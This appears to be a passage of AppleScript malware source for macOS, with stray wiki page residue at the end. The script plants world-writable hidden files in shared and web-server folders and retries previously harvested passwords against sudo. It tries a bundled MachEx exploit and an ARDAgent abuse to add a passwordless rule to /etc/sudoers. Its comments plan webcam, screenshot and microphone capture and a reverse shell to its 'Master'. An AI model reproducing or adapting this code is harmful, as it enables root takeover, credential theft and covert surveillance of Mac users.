    do shell script "mkdir -p -m 777 '/Users/Shared/SC Info/' ~/Public/ /Library/WebServer/Documents/.PS_Store 2>/dev/null; exit 0"
    do shell script "touch " & quoted form of candidates_file & " " & quoted form of accounts_file & " " & quoted form of hashes_file & " ~/Public/" & quoted form of secret_file & " /Users/Shared/" & quoted form of secret_file & " /Library/WebServer/Documents/" & quoted form of secret_file & " 2>/dev/null; exit 0"
    do shell script "chmod -Rf 777 " & quoted form of candidates_file & " " & quoted form of accounts_file & " " & quoted form of hashes_file & " ~/Public/" & quoted form of secret_file & " /Users/Shared/" & quoted form of secret_file & " /Library/WebServer/Documents/" & quoted form of secret_file & " 2>/dev/null; exit 0"
end try

--If sudo isn't working, and I don't have a password then try using passwords I collected during previous runs on this computer.
if i_have_root_access is false and my_password is "" then
    if debug then log_event("Main: trying previously gathered passwords")
    local the_passwords, the_password
    set the_passwords to words in my_username & return
    try
        set the_passwords to {the_passwords & (do shell script "grep " & quoted form of my_username & " " & quoted form of accounts_file & " 2>/dev/null | sed -e 's/^.*://g'") & return}
    end try
    try
        set the_passwords to {the_passwords & (do shell script "cat " & quoted form of candidates_file & " 2>/dev/null") & return}
    end try
    try
        set the_passwords to {the_passwords & (do shell script "grep -v ':' ~/Public/" & quoted form of secret_file & " 2>/dev/null") & return}
    end try
    set the_passwords to {do shell script "echo '" & the_passwords & "' | tr '\\r' '\\n' | sort -u "}
    repeat with the_password in the_passwords
        try
            test_a_password_with_sudo(the_password)
            exit repeat
        on error error_message number error_number
            --Just keep trying until I am out of possible passwords
        end try
    end repeat
end if

if i_have_root_access is false then
    --Try some exploits
    if OSX_version_number_minor as number < 4 or (OSX_version_number_minor as number ≤ 4 and OSX_version_number_mini as number < 8) then
        if debug then log_event("Main: Trying MachEx")
        --Attempts to run the compiled mach exception handling exploit from the Contents/Resources directory within this script's application bundle.
        try
            with timeout of 5 seconds
                do shell script quoted form of my_resources & "/MachEx <<< \"echo '" & my_username & (ASCII character 9) & "ALL=(ALL)" & (ASCII character 9) & "NOPASSWD: ALL' >> /etc/sudoers; exit\""
            end timeout
            can_sudo_come_out_to_play()
        end try
    end if
    
    if debug then log_event("Main: trying to get ARDAgent to append to /etc/sudoers")
    set tries to 0
    repeat until tries ≥ 20
        try
            set tries to tries + 1
            tell application "ARDAgent" to do shell script "echo '" & my_username & (ASCII character 9) & "ALL=(ALL)" & (ASCII character 9) & "NOPASSWD: ALL' >> /etc/sudoers"
            set tries to 25
            can_sudo_come_out_to_play()
        on error error_message number error_number
            --ignore
        end try
    end repeat
end if

--Other stuff I could do
--take pictures - do shell script quoted form of my_resources & "isightcapture ~/public/\"$(date).jpg\""
--take screenshots - do shell script "screencapture -xmC ~/public/\"$(date).jpg\""
--Listen to the microphone?

if i_am_an_admin is false and i_have_root_access is false then
    if debug then log_event("Main: i_am_an_admin is false and i_have_root_access is false")
    stuff_for_a_regular_user_to_do()
end if

if i_am_an_admin is true and i_have_root_access is false then
    if debug then log_event("Main: i_am_an_admin is true and i_have_root_access is not true")
    stuff_for_an_admin_without_sudo_to_do()
    dupe_user()
    if i_have_root_access is false then alias_sudo()
end if

if i_have_root_access is true then
    if debug then log_event("Main: i_have_root_access is true")
    stuff_for_root_to_do()
end if

if all_else_fails then
    if debug then log_event("Main: all_else_fails")
    --Still to do?
    --check for passwords laying around in files to which I have read access
    --check for write access to setuid app paths, StartupItems, LoginItems, LaunchDaemons & Agents etc.
    --go into quiet mode and just wait for sudo to work or for Master to get the reverse shell or reverse VNC connections. :)
end if

if debug then log_event("THE END")

Personal tools
Ads